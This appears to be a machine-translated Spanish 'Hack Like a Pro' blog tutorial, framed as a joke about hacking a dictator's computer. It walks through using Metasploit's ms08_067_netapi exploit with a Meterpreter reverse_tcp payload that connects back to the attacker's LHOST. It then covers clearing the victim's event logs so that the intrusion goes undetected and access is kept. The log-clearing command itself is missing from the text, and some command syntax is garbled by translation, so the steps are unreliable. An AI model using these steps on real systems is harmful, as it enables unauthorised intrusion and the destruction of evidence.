BlogHack Like a Pro

Hackea como un profesional Cómo cubrir tus pistas para que no te detecten

¡Bienvenidos de nuevo, mis hackers novatos!

Felicitaciones por su exitoso ataque que salvó al mundo de la aniquilación nuclear de nuestro pequeño y belicoso dictador devorador de Twinkies. Puede que el resto del mundo no sepa lo que hiciste, pero yo sí. ¡Buen trabajo!

Ahora que pirateamos la computadora del dictador malévolo y desactivamos temporalmente su capacidad de lanzamiento nuclear, tenemos que pensar en cubrir nuestras huellas para que él y sus secuaces no puedan rastrear nuestras buenas obras hasta nosotros.

Entonces, en este truco, ingresaremos nuevamente a su computadora, implantaremos el Meterpreter y eliminaremos cualquier rastro de que hayamos estado allí de sus archivos de registro. Encienda Metasploit y pongámonos manos a la obra para eliminar cualquier evidencia de que hayamos estado alguna vez en la computadora del dictador.

Paso 1: comprometer nuevamente su sistema

Comencemos con el mismo truco que usamos para ingresar a la computadora del dictador inicialmente:

exploit / windows / smb / ms08_067_netapi

Pero en lugar de usar la carga útil de VNC, cargaremos la carga útil de Meterpreter. Tipo:

  • msf> use exploit / windows / smb / ms08_067_netapi

Antes de continuar, aprendamos un poco más sobre este exploit. Tipo:

  • msf exploit (ms08_067_netapi) información

Esto debería traer una captura de pantalla a continuación que nos proporcione información básica sobre este exploit. Podemos ver que este truco explota una falla de análisis en el netapi dll. De esta forma, podemos colocar nuestra propia carga útil en el sistema, que en este caso es el Meterpreter.

Ahora cargamos la carga útil escribiendo:

  • msf exploit (ms08_067_netapi) establece PAYLOAD windows / meterpreter / reverse_tcp

Ahora que tenemos el exploit y la carga útil configurados, debemos configurar las opciones. En este caso, necesitamos configurar nuestras direcciones IP de LHOST (nosotros, el atacante) y RHOST (la víctima, la computadora de nuestro dictador beligerante). Simplemente escriba la dirección IP de su computadora y de su computadora.

Paso 2: Toma el control de su computadora

Ahora que tenemos todo listo para tomar el control, simplemente escribimos:

  • exploit msf (ms08_067_netapi)

Si tenemos éxito, deberíamos ver un mensaje de Meterpreter en nuestra pantalla. ¡Ahora tenemos el control total de su sistema!

En el indicador de meterpreter, ahora escribimos:

Como puede ver en la captura de pantalla anterior, este comando procede a borrar los registros de eventos en la computadora de nuestro belicoso dictador para que él y sus secuaces no tengan idea de que alguna vez hemos estado allí. Si pudiéramos ver los registros de eventos en su computadora, veremos que se han borrado todos los eventos.

Esto es fundamental tanto para proteger que nos descubran como para que sigamos teniendo acceso a su computadora. Una vez que sepan que alguien ha pirateado su computadora, es probable que tomen medidas para evitar que volvamos a ella.

¡Ahora, asegúrate de volver para más diversión y juegos de piratería en la computadora de nuestro dictador!

Fotos por El guardián, Matthew Collingwood / Shutterstock

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar